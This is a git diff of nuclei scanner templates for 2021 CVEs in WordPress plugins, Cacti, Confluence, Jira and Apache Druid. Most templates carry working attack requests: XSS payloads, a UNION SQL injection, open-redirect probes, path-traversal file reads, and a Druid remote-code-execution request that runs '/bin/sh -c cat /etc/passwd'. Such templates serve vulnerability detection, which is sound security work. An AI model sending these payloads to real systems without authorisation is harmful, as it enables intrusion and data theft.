a/nuclei-templates/CVE-2021/CVE-2021-24342.yaml b/nuclei-templates/CVE-2021/CVE-2021-24342.yaml deleted file mode 100644 index 3a16a48e13..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-24342.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: CVE-2021-24342 - -info: - name: JNews < 8.0.6 - Reflected Cross-Site Scripting (XSS) - author: pikpikcu - severity: medium - description: JNews WordPress theme before 8.0.6 did not sanitise the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*), leading to a Reflected Cross-Site Scripting (XSS) issue. - reference: - - https://wpscan.com/vulnerability/415ca763-fe65-48cb-acd3-b375a400217e - - https://nvd.nist.gov/vuln/detail/CVE-2021-24342 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-24342 - cwe-id: CWE-79 - tags: cve,cve2021,wordpress,xss,wp-plugin - -requests: - - raw: - - | - POST /?ajax-request=jnews HTTP/1.1 - Host: {{Hostname}} - Accept: */* - Content-Type: application/x-www-form-urlencoded - - lang=en_US&cat_id=6">&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67 - - matchers-condition: and - matchers: - - - type: word - words: - - '' - part: body - - - type: word - words: - - 'Content-Type: text/html' - part: header - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-24358.yaml b/nuclei-templates/CVE-2021/CVE-2021-24358.yaml index 8fca16aa7c..0a3d7635fd 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24358.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24358.yaml @@ -5,23 +5,35 @@ info: author: dhiyaneshDk severity: medium description: WordPress Plus Addons for Elementor Page Builder before 4.1.10 did not validate a redirect parameter on a specifically crafted URL before redirecting the user to it, leading to an open redirect issue. + impact: | + This vulnerability can be exploited by attackers to trick users into visiting malicious websites, leading to potential phishing attacks or the execution of other malicious activities. + remediation: | + Upgrade Plus Addons for Elementor Page Builder to version 4.1.10 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/fd4352ad-dae0-4404-94d1-11083cb1f44d - https://nvd.nist.gov/vuln/detail/CVE-2021-24358 - https://theplusaddons.com/changelog/ + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24358 cwe-id: CWE-601 - tags: wp,wpscan,cve,cve2021,wordpress,redirect,wp-plugin,elementor + epss-score: 0.00329 + epss-percentile: 0.70388 + cpe: cpe:2.3:a:posimyth:the_plus_addons_for_elementor:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 2 + vendor: posimyth + product: the_plus_addons_for_elementor + framework: wordpress + tags: cve2021,cve,wp,wpscan,wordpress,redirect,wp-plugin,elementor,posimyth -requests: +http: - raw: - | GET /?author=1 HTTP/1.1 Host: {{Hostname}} - - | GET /wp-login.php?action=theplusrp&key=&redirecturl=http://interact.sh&forgoturl=http://interact.sh&login={{username}} HTTP/1.1 Host: {{Hostname}} @@ -31,23 +43,22 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 extractors: - type: regex - part: body name: username - internal: true group: 1 regex: - 'Author:(?:[A-Za-z0-9 -\_="]+)?' + - 'Post Grid' + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-24495.yaml b/nuclei-templates/CVE-2021/CVE-2021-24495.yaml deleted file mode 100644 index 7851a3c8fc..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-24495.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2021-24495 - -info: - name: Wordpress Plugin Marmoset Viewer XSS - author: johnjhacking - severity: medium - description: The Marmoset Viewer WordPress plugin before 1.9.3 does not property sanitize, validate or escape the 'id' parameter before outputting back in the page, leading to a reflected Cross-Site Scripting issue. - reference: - - https://johnjhacking.com/blog/cve-2021-24495-improper-neutralization-of-input-during-web-page-generation-on-id-parameter-in-wordpress-marmoset-viewer-plugin-versions-1.9.3-leads-to-reflected-cross-site-scripting/ - - https://wordpress.org/plugins/marmoset-viewer/#developers - - https://wpscan.com/vulnerability/d11b79a3-f762-49ab-b7c8-3174624d7638 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-24495 - cwe-id: CWE-79 - tags: cve,cve2021,wp-plugin,wordpress,xss - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://" - - "{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/{{randstr}}/);marmoset.embed(%27a" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "" - - "alert(/{{randstr}}/)" - part: body - condition: or - - - type: word - words: - - "Marmoset Viewer" diff --git a/nuclei-templates/CVE-2021/CVE-2021-24498.yaml b/nuclei-templates/CVE-2021/CVE-2021-24498.yaml new file mode 100644 index 0000000000..2ac66c4bd8 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-24498.yaml @@ -0,0 +1,42 @@ +id: CVE-2021-24498 + +info: + name: Calendar Event Multi View < 1.4.01 - Unauthenticated Reflected Cross-Site Scripting (XSS) + author: suman_kar + severity: medium + description: The plugin does not sanitise or escape the 'start' and 'end' GET parameters before outputting them in the page (via php/edit.php), leading to a reflected Cross-Site Scripting issue. + reference: + - https://wpscan.com/vulnerability/3c5a5187-42b3-4f88-9b0e-4fdfa1c39e86 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-24498 + cwe-id: CWE-79 + tags: cve,cve2021,xss,wordpress,wp-plugin + +requests: + - raw: + - | + GET /?cpmvc_id=1&cpmvc_do_action=mvparse&f=edit&month_index=0&delete=1&palette=0&paletteDefault=F00&calid=1&id=999&start=a%22%3E%3Csvg/%3E%3C%22&end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22 HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 + Connection: close + + matchers-condition: and + matchers: + - type: word + words: + - '><' + - 'Calendar Details' + part: body + condition: and + + - type: word + words: + - 'text/html' + part: header + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-24499.yaml b/nuclei-templates/CVE-2021/CVE-2021-24499.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-24499.yaml rename to nuclei-templates/CVE-2021/CVE-2021-24499.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-24510.yaml b/nuclei-templates/CVE-2021/CVE-2021-24510.yaml deleted file mode 100644 index 37b803ab59..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-24510.yaml +++ /dev/null @@ -1,48 +0,0 @@ -id: CVE-2021-24510 - -info: - name: MF Gig Calendar <= 1.1 - Reflected Cross-Site Scripting (XSS) - author: dhiyaneshDK - severity: medium - description: The MF Gig Calendar WordPress plugin through 1.1 does not sanitise or escape the id GET parameter before outputting back in the admin dashboard when editing an Event, leading to a reflected Cross-Site Scripting issue - reference: - - https://wpscan.com/vulnerability/715721b0-13a1-413a-864d-2380f38ecd39 - - https://nvd.nist.gov/vuln/detail/CVE-2021-24510 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-24510 - cwe-id: CWE-79 - tags: wordpress,cve,cve2021,wp-plugin,authenticated - -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP%20Cookie%20check - - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - - | - GET /wp-admin/admin.php?page=mf_gig_calendar&action=edit&id="><" HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - '' - - - type: status - status: - - 200 - - - type: word - part: header - words: - - "text/html" diff --git a/nuclei-templates/CVE-2021/CVE-2021-24746.yaml b/nuclei-templates/CVE-2021/CVE-2021-24746.yaml index 3ed4f8b80a..e70a4f07bc 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24746.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24746.yaml @@ -1,30 +1,43 @@ id: CVE-2021-24746 info: - name: WordPress Sassy Social Share Plugin - Reflected XSS + name: WordPress Sassy Social Share Plugin <3.3.40 - Cross-Site Scripting author: Supras severity: medium - description: WP plugin Sassy Social Share < 3.3.40 - Reflected Cross-Site Scripting + description: WordPress plugin Sassy Social Share < 3.3.40 contains a reflected cross-site scripting vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. + remediation: | + Update the WordPress Sassy Social Share Plugin to version 3.3.40 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/99f4fb32-e312-4059-adaf-f4cbaa92d4fa - https://nvd.nist.gov/vuln/detail/CVE-2021-24746 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24746 cwe-id: CWE-79 + epss-score: 0.00106 + epss-percentile: 0.42122 + cpe: cpe:2.3:a:heateor:sassy_social_share:*:*:*:*:*:wordpress:*:* metadata: + max-request: 2 + vendor: heateor + product: sassy_social_share + framework: wordpress google-query: inurl:"/wp-content/plugins/sassy-social-share" - tags: cve,cve2021,wordpress,wp-plugin,xss,wp + tags: cve,cve2021,wordpress,wp-plugin,xss,wp,wpscan,heateor -requests: +http: - method: GET path: - "{{BaseURL}}/wp-json/wp/v2/posts" - "{{BaseURL}}/{{slug}}/?a"><script>alert(document.domain)</script>" - redirects: true + host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word @@ -43,9 +56,10 @@ requests: extractors: - type: regex - part: body name: slug - internal: true group: 1 regex: - '"slug":"([_a-z-A-Z0-9]+)",' + internal: true + part: body +# digest: 4a0a0047304502200993a9a2953aa772460c25d771fb5bc7793c9f97df213694a924f140c82564c2022100ee73b7aa4e200224d68aa207881162ef141bd75466b4b8a9c7973eb4706c3839:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24750.yaml b/nuclei-templates/CVE-2021/CVE-2021-24750.yaml deleted file mode 100644 index 9e34e7e0ac..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-24750.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: CVE-2021-24750 - -info: - name: WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 SQLI - author: cckuakilong - severity: high - description: The WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 does not properly sanitise and escape the refUrl in the refDetails AJAX action, available to any authenticated user, which could allow users with a role as low as subscriber to perform SQL injection attacks. - reference: - - https://github.com/fimtow/CVE-2021-24750/blob/master/exploit.py - - https://nvd.nist.gov/vuln/detail/CVE-2021-24750 - - https://wpscan.com/vulnerability/7528aded-b8c9-4833-89d6-9cd7df3620de - - https://plugins.trac.wordpress.org/changeset/2622268 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2021-24750 - cwe-id: CWE-89 - tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,authenticated - -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP%20Cookie%20check - - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - - | - GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5('CVE-2021-24750'),4--%20%22%7D HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "266f89556d2b38ff067b580fb305c522" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-24910.yaml b/nuclei-templates/CVE-2021/CVE-2021-24910.yaml new file mode 100644 index 0000000000..bd2581d33d --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-24910.yaml @@ -0,0 +1,32 @@ +id: CVE-2021-24910 +info: + name: Transposh WordPress < 1.0.7 - Reflected Cross-Site Scripting (XSS) + author: Screamy + severity: medium + reference: + - https://www.rcesecurity.com/2022/07/WordPress-Transposh-Exploiting-a-Blind-SQL-Injection-via-XSS/ + - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-24910.txt + - https://wpscan.com/vulnerability/b5cbebf4-5749-41a0-8be3-3333853fca17 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24910 + metadata: + verified: true + tags: cve,cve2021,wordpress,wp-plugin,xss,wp +requests: + - method: GET + path: + - "{{BaseURL}}/wp-admin/admin-ajax.php?action=tp_tp&e=g&m=s&tl=en&q=" + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - '{"result":' + condition: and + - type: word + part: header + words: + - "text/html" + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-25033.yaml b/nuclei-templates/CVE-2021/CVE-2021-25033.yaml new file mode 100644 index 0000000000..5348a3bb8c --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-25033.yaml @@ -0,0 +1,27 @@ +id: CVE-2021-25033 +info: + name: Noptin < 1.6.5 - Open Redirect + author: dhiyaneshDk + severity: medium + description: Noptin < 1.6.5 is susceptible to an open redirect vulnerability. The plugin does not validate the "to" parameter before redirecting the user to its given value, leading to an open redirect issue. + reference: + - https://wpscan.com/vulnerability/c2d2384c-41b9-4aaf-b918-c1cfda58af5c + - https://plugins.trac.wordpress.org/changeset/2639592 + - https://nvd.nist.gov/vuln/detail/CVE-2021-25033 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-25033 + cwe-id: CWE-601 + tags: cve,cve2021,wordpress,redirect,wp-plugin,noptin,wp +requests: + - method: GET + path: + - "{{BaseURL}}/?noptin_ns=email_click&to=https://interact.sh" + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + +# Enhanced by mp on 2022/04/13 diff --git a/nuclei-templates/CVE-2021/CVE-2021-25055.yaml b/nuclei-templates/CVE-2021/CVE-2021-25055.yaml deleted file mode 100644 index b66669b70a..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-25055.yaml +++ /dev/null @@ -1,52 +0,0 @@ -id: CVE-2021-25055 - -info: - name: WordPress FeedWordPress < 2022.0123 - Authenticated Reflected Cross-Site Scripting - author: DhiyaneshDK - severity: medium - description: | - The plugin is affected by a cross-site scripting vulnerability within the "visibility" parameter. - reference: - - https://wpscan.com/vulnerability/7ed050a4-27eb-4ecb-9182-1d8fa1e71571 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25055 - - https://plugins.trac.wordpress.org/changeset/2662665 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-25055 - cwe-id: CWE-79 - tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated - -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP%20Cookie%20check - - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - - | - GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D1+onerror%3Dalert%28document.domain%29%3E HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/04/13 diff --git a/nuclei-templates/CVE-2021/cve-2021-25074.yaml b/nuclei-templates/CVE-2021/CVE-2021-25074.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-25074.yaml rename to nuclei-templates/CVE-2021/CVE-2021-25074.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-25075.yaml b/nuclei-templates/CVE-2021/CVE-2021-25075.yaml deleted file mode 100644 index c3af39b163..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-25075.yaml +++ /dev/null @@ -1,53 +0,0 @@ -id: CVE-2021-25075 -info: - name: WordPress Duplicate Page or Post < 1.5.1 - Stored XSS - author: DhiyaneshDK - severity: low - description: | - The plugin does not have any authorisation and has a flawed CSRF check in the wpdevart_duplicate_post_parametrs_save_in_db AJAX action, allowing any authenticated users, such as subscriber to call it and change the plugin's settings, or perform such attack via CSRF. Furthermore, due to the lack of escaping, this could lead to Stored Cross-Site Scripting issues. - remediation: Fixed in version 1.5.1. - reference: - - https://wpscan.com/vulnerability/db5a0431-af4d-45b7-be4e-36b6c90a601b - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25075 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N - cvss-score: 3.50 - cve-id: CVE-2021-25075 - cwe-id: CWE-862 - tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP%20Cookie%20check - - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | - POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP%20Cookie%20check - - action=wpdevart_duplicate_post_parametrs_save_in_db&title_prefix=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2fXSS%2f%29+p - - | - GET /wp-admin/admin.php?page=wpda_duplicate_post_menu HTTP/1.1 - Host: {{Hostname}} - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "style=animation-name:rotation onanimationstart=alert(/XSS/) p" - - "toplevel_page_wpda_duplicate_post_menu" - condition: and - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-25111.yaml b/nuclei-templates/CVE-2021/CVE-2021-25111.yaml deleted file mode 100644 index 7c8f439e97..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-25111.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: CVE-2021-25111 - -info: - name: English WordPress Admin < 1.5.2 - Unauthenticated Open Redirect - author: akincibor - severity: medium - description: The plugin does not validate the admin_custom_language_return_url before redirecting users o it, leading to an open redirect issue. - reference: - - https://wpscan.com/vulnerability/af548fab-96c2-4129-b609-e24aad0b1fc4 - tags: wp-plugin,redirect,wordpress,wp,cve,cve2021,unauth - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2021-25111 - cwe-id: CWE-601 - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://example.com" - - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/nuclei-templates/CVE-2021/CVE-2021-25112.yaml b/nuclei-templates/CVE-2021/CVE-2021-25112.yaml deleted file mode 100644 index 1705945685..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-25112.yaml +++ /dev/null @@ -1,51 +0,0 @@ -id: CVE-2021-25112 - -info: - name: WordPress WHMCS Bridge < 6.4b - Cross-Site Scripting - author: DhiyaneshDK - severity: medium - description: WordPress WHMCS Bridge < 6.4b is susceptible to authenticated reflected cross-site scripting because the plugin does not sanitize and escape the error parameter before outputting it back in admin dashboard. - reference: - - https://wpscan.com/vulnerability/4aae2dd9-8d51-4633-91bc-ddb53ca3471c - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25112 - - https://plugins.trac.wordpress.org/changeset/2659751 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-25112 - cwe-id: CWE-79 - tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated - -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP%20Cookie%20check - - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - - | - GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/04/21 diff --git a/nuclei-templates/CVE-2021/CVE-2021-25646.yaml b/nuclei-templates/CVE-2021/CVE-2021-25646.yaml deleted file mode 100644 index f5056c289a..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-25646.yaml +++ /dev/null @@ -1,84 +0,0 @@ -id: CVE-2021-25646 - -info: - name: Apache Druid RCE - author: pikpikcu - severity: high - description: | - Apache Druid is a column-oriented open source distributed data storage written in Java, designed to quickly obtain large amounts of event data and provide low-latency queries on the data. - Apache Druid lacks authorization and authentication by default. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server. - reference: - - https://paper.seebug.org/1476/ - - https://lists.apache.org/thread.html/rfda8a3aa6ac06a80c5cbfdeae0fc85f88a5984e32ea05e6dda46f866%40%3Cdev.druid.apache.org%3E - - http://www.openwall.com/lists/oss-security/2021/01/29/6 - - https://lists.apache.org/thread.html/r64431c2b97209f566b5dff92415e7afba0ed3bfab4695ebaa8a62e5d@%3Cdev.druid.apache.org%3E - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2021-25646 - cwe-id: CWE-732 - tags: cve,cve2021,apache,rce,druid - -requests: - - raw: - - | - POST /druid/indexer/v1/sampler HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - { - "type":"index", - "spec":{ - "ioConfig":{ - "type":"index", - "firehose":{ - "type":"local", - "baseDir":"/etc", - "filter":"passwd" - } - }, - "dataSchema":{ - "dataSource":"odgjxrrrePz", - "parser":{ - "parseSpec":{ - "format":"javascript", - "timestampSpec":{ - - }, - "dimensionsSpec":{ - - }, - "function":"function(){var hTVCCerYZ = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\"/bin/sh`@~-c`@~cat /etc/passwd\".split(\"`@~\")).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:\"4137368\",OQtGXcxBVQVL: hTVCCerYZ}}", - "":{ - "enabled":"true" - } - } - } - } - }, - "samplerConfig":{ - "numRows":10 - } - } - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "application/json" - part: header - - - type: word - words: - - "numRowsRead" - - "numRowsIndexed" - part: body - condition: and - - - type: regex - regex: - - "root:.*:0:0:" - part: body diff --git a/nuclei-templates/CVE-2021/CVE-2021-26085.yaml b/nuclei-templates/CVE-2021/CVE-2021-26085.yaml deleted file mode 100644 index f2032f23ff..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-26085.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2021-26085 -info: - name: Confluence Pre-Authorization Arbitrary File Read in /s/ endpoint - CVE-2021-26085 - author: princechaddha - severity: medium - description: Affected versions of Atlassian Confluence Server allow remote attackers to view restricted resources via a Pre-Authorization Arbitrary File Read vulnerability in the /s/ endpoint. - reference: - - https://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html - - https://nvd.nist.gov/vuln/detail/CVE-2021-26085 - - https://jira.atlassian.com/browse/CONFSERVER-67893 - - http://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2021-26085 - cwe-id: CWE-862 - metadata: - shodan-query: http.component:"Atlassian Confluence" - tags: cve,cve2021,confluence,atlassian,lfi,kev -requests: - - method: GET - path: - - "{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - part: body - words: - - "Confluence" - - "com.atlassian.confluence.setup.ConfluenceAppConfig" - condition: and diff --git a/nuclei-templates/CVE-2021/CVE-2021-26086.yaml b/nuclei-templates/CVE-2021/CVE-2021-26086.yaml new file mode 100644 index 0000000000..6f562be26f --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-26086.yaml @@ -0,0 +1,35 @@ +id: CVE-2021-26086 + +info: + name: Jira Limited Local File Read + author: cocxanh + severity: medium + description: Affected versions of Atlassian Jira Server and Data Center allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint. + reference: + - https://jira.atlassian.com/browse/JRASERVER-72695 + - https://nvd.nist.gov/vuln/detail/CVE-2021-26086 + - http://packetstormsecurity.com/files/164405/Atlassian-Jira-Server-Data-Center-8.4.0-File-Read.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2021-26086 + cwe-id: CWE-22 + tags: cve,cve2021,jira,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "" + part: body + condition: and diff --git a/nuclei-templates/CVE-2021/CVE-2021-26247.yaml b/nuclei-templates/CVE-2021/CVE-2021-26247.yaml index 3a51363f35..aed11f963e 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-26247.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-26247.yaml @@ -1,21 +1,34 @@ id: CVE-2021-26247 info: - name: Unauthenticated XSS Cacti - auth_changepassword.php + name: Cacti - Cross-Site Scripting author: dhiyaneshDK severity: medium - description: As an unauthenticated remote user, visit "http:///auth_changepassword.php?ref=" to successfully execute the JavaScript payload present in the "ref" URL parameter. + description: Cacti contains a cross-site scripting vulnerability via "http:///auth_changepassword.php?ref=" which can successfully execute the JavaScript payload present in the "ref" URL parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Apply the latest security patches or upgrade to a patched version of Cacti to mitigate this vulnerability. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-26247 - https://www.cacti.net/info/changelog + - https://nvd.nist.gov/vuln/detail/CVE-2021-26247 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-26247 cwe-id: CWE-79 + epss-score: 0.00255 + epss-percentile: 0.647 + cpe: cpe:2.3:a:cacti:cacti:0.8.7g:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: cacti + product: cacti tags: cve,cve2021,cacti,xss -requests: +http: - method: GET path: - '{{BaseURL}}/auth_changepassword.php?ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E' @@ -35,3 +48,4 @@ requests: - type: status status: - 200 +# digest: 4b0a00483046022100e338922cb8b551aff81b4174eeb54b3d03de0063dcba852a37d9e56fca5b6aac022100889322591e888230de5003fd765440786e4839255f6b01983ec19666b8e127f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-26598.yaml b/nuclei-templates/CVE-2021/CVE-2021-26598.yaml new file mode 100644 index 0000000000..148674a260 --- /dev/null +++ 